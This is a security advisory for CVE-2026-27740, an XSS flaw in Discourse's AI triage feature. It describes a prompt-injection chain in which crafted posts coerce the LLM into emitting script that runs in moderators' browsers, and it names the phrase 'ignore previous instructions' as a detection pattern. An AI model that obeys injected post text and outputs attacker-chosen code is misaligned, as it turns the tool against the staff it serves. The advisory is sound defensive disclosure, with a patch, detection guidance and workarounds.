CVE-2026-27740 Overview
CVE-2026-27740 is a Cross-Site Scripting (XSS) vulnerability in Discourse, the popular open-source discussion platform. The vulnerability exists in the AI-powered content triage feature, where raw output from a Large Language Model (LLM) is rendered using htmlSafe in the Review Queue interface without adequate sanitization. This allows attackers to leverage prompt injection techniques to force the AI to return malicious JavaScript payloads that execute when Staff members (Administrators or Moderators) view flagged posts.
Critical Impact
Attackers can execute arbitrary JavaScript in the browser context of privileged Staff users, potentially leading to session hijacking, administrative account compromise, or unauthorized configuration changes on Discourse installations using AI triage automation.
Affected Products
- Discourse versions prior to 2026.3.0-latest.1
- Discourse versions prior to 2026.2.1
- Discourse versions prior to 2026.1.2
Discovery Timeline
- 2026-03-19 - CVE-2026-27740 published to NVD
- 2026-03-19 - Last updated in NVD database
Technical Details for CVE-2026-27740
Vulnerability Analysis
This vulnerability represents an emerging attack surface where AI/LLM integrations introduce new security risks into web applications. The core issue stems from a trust boundary violation: the Discourse AI plugin treats LLM-generated content as safe when it should be considered untrusted user input. When the AI triage automation processes flagged posts, it passes the LLM's response directly into an internationalization (I18n) template that gets rendered in the Review Queue using htmlSafe, which explicitly bypasses HTML encoding protections.
The attack chain requires an attacker to craft malicious post content designed to manipulate the LLM through prompt injection. When the AI processes this content for triage, it can be coerced into including malicious HTML or JavaScript in its response. Since Staff members rely on the Review Queue to moderate content, they will inevitably view the flagged post, triggering the XSS payload execution in their authenticated browser session.
Root Cause
The root cause is the absence of output sanitization on LLM-generated content before it is rendered in the browser. The vulnerable code paths in multiple files (llm_triage.rb, flag_post.rb) directly interpolated the llm_response and automation_name variables into the I18n template without applying HTML escaping. This violates the security principle that all dynamic content—regardless of source—must be sanitized before being rendered as HTML.
Attack Vector
The attack is network-based and requires an authenticated user account (low privileges) to submit the malicious content. The exploitation requires user interaction, as a Staff member must view the flagged post in the Review Queue. The attack flow proceeds as follows:
- Attacker creates a post containing prompt injection payloads designed to manipulate the LLM
- The AI triage automation processes the post and the LLM is tricked into including malicious script tags in its response
- The response is stored as part of the flag reason without sanitization
- When a Staff member opens the Review Queue and views the flagged post, the malicious JavaScript executes in their browser
- The attacker can then steal session tokens, perform actions as the administrator, or further compromise the platform
The following patch demonstrates how the fix properly escapes LLM output using ERB::Util.html_escape:
I18n.t(
"discourse_automation.scriptables.llm_triage.flagged_post",
base_path: Discourse.base_path,
- llm_response: result,
+ llm_response: ERB::Util.html_escape(result),
automation_id: automation&.id.to_s,
- automation_name: automation&.name.to_s,
+ automation_name: ERB::Util.html_escape(automation&.name.to_s),
)
if !flagged_by_tool
Source: GitHub Commit Update
Detection Methods for CVE-2026-27740
Indicators of Compromise
- Unusual script tags or JavaScript code appearing in flag reasons within the Review Queue
- Unexpected HTTP requests or outbound connections from Staff browsers after viewing flagged content
- Posts containing suspicious prompt injection patterns such as "ignore previous instructions" or embedded HTML tags
- Anomalous administrative actions performed without corresponding legitimate administrator sessions
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor web application logs for patterns indicating prompt injection attempts in user-submitted content
- Review browser console logs from Staff workstations for JavaScript errors or unauthorized script execution
- Audit the reviewable_scores database table for flag reasons containing HTML or script tags
Monitoring Recommendations
- Enable detailed logging for all AI triage automation activities and flag creation events
- Set up alerts for any content in the Review Queue containing potential XSS vectors like <script>, <img onerror, or event handlers
- Monitor for unusual session activity from Staff accounts, particularly after Review Queue interactions
- Implement real-time monitoring of CSP violation reports to detect exploitation attempts
How to Mitigate CVE-2026-27740
Immediate Actions Required
- Update Discourse to version 2026.3.0-latest.1, 2026.2.1, or 2026.1.2 immediately
- If immediate patching is not possible, disable AI triage automation scripts as a temporary workaround
- Review Recent Review Queue activity for any suspicious flag reasons that may contain script content
- Invalidate and rotate Staff session tokens if exploitation is suspected
Patch Information
Discourse has released patches across multiple release tracks. The fix applies ERB::Util.html_escape to all LLM-generated content before it is interpolated into templates. The patches address the vulnerability in multiple code paths including plugins/discourse-ai/lib/automation/llm_triage.rb, plugins/discourse-ai/lib/personas/tools/flag_post.rb, and plugins/discourse-ai/lib/agents/tools/flag_post.rb.
For detailed patch information, refer to:
Workarounds
- Temporarily disable AI triage automation scripts via the Discourse admin panel until patching is complete
- Implement a Web Application Firewall (WAF) rule to strip or block potential XSS payloads in Review Queue responses
- Restrict Review Queue access to a minimal number of Staff members until the vulnerability is patched
- Enable strict Content Security Policy headers to mitigate the impact of any successful XSS exploitation
# Disable AI triage automation via Rails console (temporary workaround)
cd /var/discourse
./launcher enter app
rails c
# Disable specific automation scripts
Automation.where(script: "llm_triage").update_all(enabled: false)
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


